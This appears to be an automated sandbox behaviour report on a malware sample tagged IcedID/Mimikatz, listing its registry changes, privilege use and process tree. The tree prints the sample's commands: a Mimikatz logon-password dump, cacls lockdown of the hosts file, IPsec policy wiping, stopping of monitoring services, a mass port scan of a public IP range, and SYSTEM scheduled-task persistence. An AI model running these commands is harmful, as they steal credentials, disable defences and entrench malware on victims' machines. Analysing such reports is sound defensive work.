2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bzbnzbyct.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmyfwky.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language midctcinn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skaikk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 1988 cmd.exe 2768 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x0008000000023caa-6.dat nsis_installer_2 behavioral2/files/0x0008000000023cb8-15.dat nsis_installer_1 behavioral2/files/0x0008000000023cb8-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 41 IoCs
Processes:
cmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.exetmyfwky.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" tmyfwky.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" tmyfwky.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe -
Modifies registry class 14 IoCs
Processes:
tmyfwky.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" tmyfwky.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 4948 schtasks.exe 3464 schtasks.exe 3188 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
tmyfwky.exepid Process 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exepid Process 4280 2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exetmyfwky.exetmyfwky.exevfshost.execmzbnyytn.exelfbpkn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.exedescription pid Process Token: SeDebugPrivilege 4280 2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2400 tmyfwky.exe Token: SeDebugPrivilege 3184 tmyfwky.exe Token: SeDebugPrivilege 672 vfshost.exe Token: SeDebugPrivilege 3468 cmzbnyytn.exe Token: SeLockMemoryPrivilege 1412 lfbpkn.exe Token: SeLockMemoryPrivilege 1412 lfbpkn.exe Token: SeDebugPrivilege 2684 cmzbnyytn.exe Token: SeDebugPrivilege 3728 cmzbnyytn.exe Token: SeDebugPrivilege 4572 cmzbnyytn.exe Token: SeDebugPrivilege 4928 cmzbnyytn.exe Token: SeDebugPrivilege 1384 cmzbnyytn.exe Token: SeDebugPrivilege 2328 cmzbnyytn.exe Token: SeDebugPrivilege 4824 cmzbnyytn.exe Token: SeDebugPrivilege 4996 cmzbnyytn.exe Token: SeDebugPrivilege 4956 cmzbnyytn.exe Token: SeDebugPrivilege 4496 cmzbnyytn.exe Token: SeDebugPrivilege 5044 cmzbnyytn.exe Token: SeDebugPrivilege 2432 cmzbnyytn.exe Token: SeDebugPrivilege 2344 cmzbnyytn.exe Token: SeDebugPrivilege 1964 cmzbnyytn.exe Token: SeDebugPrivilege 2796 cmzbnyytn.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exetmyfwky.exetmyfwky.exexohudmc.exeskaikk.exetmyfwky.exepid Process 4280 2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe 4280 2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe 2400 tmyfwky.exe 2400 tmyfwky.exe 3184 tmyfwky.exe 3184 tmyfwky.exe 1792 xohudmc.exe 3940 skaikk.exe 2244 tmyfwky.exe 2244 tmyfwky.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.execmd.exetmyfwky.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 4280 wrote to memory of 1988 4280 2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe 85 PID 4280 wrote to memory of 1988 4280 2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe 85 PID 4280 wrote to memory of 1988 4280 2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe 85 PID 1988 wrote to memory of 2768 1988 cmd.exe 87 PID 1988 wrote to memory of 2768 1988 cmd.exe 87 PID 1988 wrote to memory of 2768 1988 cmd.exe 87 PID 1988 wrote to memory of 2400 1988 cmd.exe 89 PID 1988 wrote to memory of 2400 1988 cmd.exe 89 PID 1988 wrote to memory of 2400 1988 cmd.exe 89 PID 3184 wrote to memory of 4824 3184 tmyfwky.exe 91 PID 3184 wrote to memory of 4824 3184 tmyfwky.exe 91 PID 3184 wrote to memory of 4824 3184 tmyfwky.exe 91 PID 4824 wrote to memory of 2864 4824 cmd.exe 93 PID 4824 wrote to memory of 2864 4824 cmd.exe 93 PID 4824 wrote to memory of 2864 4824 cmd.exe 93 PID 4824 wrote to memory of 1536 4824 cmd.exe 94 PID 4824 wrote to memory of 1536 4824 cmd.exe 94 PID 4824 wrote to memory of 1536 4824 cmd.exe 94 PID 4824 wrote to memory of 112 4824 cmd.exe 95 PID 4824 wrote to memory of 112 4824 cmd.exe 95 PID 4824 wrote to memory of 112 4824 cmd.exe 95 PID 4824 wrote to memory of 1296 4824 cmd.exe 96 PID 4824 wrote to memory of 1296 4824 cmd.exe 96 PID 4824 wrote to memory of 1296 4824 cmd.exe 96 PID 4824 wrote to memory of 2772 4824 cmd.exe 97 PID 4824 wrote to memory of 2772 4824 cmd.exe 97 PID 4824 wrote to memory of 2772 4824 cmd.exe 97 PID 4824 wrote to memory of 3244 4824 cmd.exe 98 PID 4824 wrote to memory of 3244 4824 cmd.exe 98 PID 4824 wrote to memory of 3244 4824 cmd.exe 98 PID 3184 wrote to memory of 1180 3184 tmyfwky.exe 100 PID 3184 wrote to memory of 1180 3184 tmyfwky.exe 100 PID 3184 wrote to memory of 1180 3184 tmyfwky.exe 100 PID 3184 wrote to memory of 932 3184 tmyfwky.exe 102 PID 3184 wrote to memory of 932 3184 tmyfwky.exe 102 PID 3184 wrote to memory of 932 3184 tmyfwky.exe 102 PID 3184 wrote to memory of 3792 3184 tmyfwky.exe 104 PID 3184 wrote to memory of 3792 3184 tmyfwky.exe 104 PID 3184 wrote to memory of 3792 3184 tmyfwky.exe 104 PID 3184 wrote to memory of 3040 3184 tmyfwky.exe 109 PID 3184 wrote to memory of 3040 3184 tmyfwky.exe 109 PID 3184 wrote to memory of 3040 3184 tmyfwky.exe 109 PID 3040 wrote to memory of 3524 3040 cmd.exe 111 PID 3040 wrote to memory of 3524 3040 cmd.exe 111 PID 3040 wrote to memory of 3524 3040 cmd.exe 111 PID 3524 wrote to memory of 4796 3524 wpcap.exe 112 PID 3524 wrote to memory of 4796 3524 wpcap.exe 112 PID 3524 wrote to memory of 4796 3524 wpcap.exe 112 PID 4796 wrote to memory of 4720 4796 net.exe 114 PID 4796 wrote to memory of 4720 4796 net.exe 114 PID 4796 wrote to memory of 4720 4796 net.exe 114 PID 3524 wrote to memory of 220 3524 wpcap.exe 115 PID 3524 wrote to memory of 220 3524 wpcap.exe 115 PID 3524 wrote to memory of 220 3524 wpcap.exe 115 PID 220 wrote to memory of 4700 220 net.exe 117 PID 220 wrote to memory of 4700 220 net.exe 117 PID 220 wrote to memory of 4700 220 net.exe 117 PID 3524 wrote to memory of 3216 3524 wpcap.exe 118 PID 3524 wrote to memory of 3216 3524 wpcap.exe 118 PID 3524 wrote to memory of 3216 3524 wpcap.exe 118 PID 3216 wrote to memory of 3020 3216 net.exe 120 PID 3216 wrote to memory of 3020 3216 net.exe 120 PID 3216 wrote to memory of 3020 3216 net.exe 120 PID 3524 wrote to memory of 1452 3524 wpcap.exe 121
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2060
-
C:\Windows\TEMP\dvfzrticv\lfbpkn.exe"C:\Windows\TEMP\dvfzrticv\lfbpkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\cbdnbivt\tmyfwky.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2768
-
-
C:\Windows\cbdnbivt\tmyfwky.exeC:\Windows\cbdnbivt\tmyfwky.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2400
-
-
-
C:\Windows\cbdnbivt\tmyfwky.exeC:\Windows\cbdnbivt\tmyfwky.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2864
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:112
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2772
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3244
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1180
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:932
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3792
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\itcctjlje\unptrtjvi\wpcap.exeC:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4720
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4700
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:3020
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1452 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:876
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2288 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4680 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:548
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3428
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1744 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3112
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:2348 -
C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exeC:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\itcctjlje\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1792 -
C:\Windows\itcctjlje\Corporate\vfshost.exeC:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"2⤵PID:4952
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3464
-
-
-
